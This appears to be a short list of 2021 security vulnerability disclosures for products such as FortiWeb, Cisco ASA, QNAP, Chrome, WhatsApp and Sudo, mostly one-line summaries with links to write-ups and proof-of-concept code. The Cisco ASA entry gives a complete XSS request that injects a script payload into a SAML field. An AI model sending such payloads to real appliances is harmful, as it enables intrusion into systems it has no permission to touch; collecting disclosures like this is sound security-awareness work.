Fortinet FortiWeb OS Command Injection PoC The patch will be released at the end of August https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/

ThroughTek "Kalay" Network Device Impersonation Vulnerability Proof of Concept. The vulnerability affects millions of IoT devices.

Cisco Adaptive Security Appliance (ASA) XSS POC: POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: ciscoASA.local Content-Type: application/x-www-form-urlencoded Content-Length: 44 SAMLResponse="><svg/onload=alert('PTSwarm')>

QNAP NAS HBS 3 Hybrid Backup Syn Hard-Coded Credentials QLocker Ransomware is using this vulnerability to encrypt files of QNAP customers. https://forum.qnap.com/viewtopic.php?t=160876&p=787015

Write-up of CVE-2021-30481 Source engine remote code execution via game invites https://secret.club/2021/04/20/source-engine-rce-invite.html

Airstrike Attack - FDE bypass and EoP on domain joined Windows workstations (CVE-2021-28316) https://shenaniganslabs.io/2021/04/13/Airstrike.html

Remote exploitation of a man-in-the-disk vulnerability in WhatsApp (CVE-2021-24027) https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/

Exploit of CVE-2020-16040 Google Chrome <= 87.0.4280.88 vulnerability https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040

Zoom Unintended Screen Sharing Vulnerability POC:

heap overflow vulnerability in Sudo leads attackers to gain root privileges. Sudo is affected by this vulnerability for ten years (since July 2011). This vulnerability has been found by Qualys Research Team. Details are here: https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit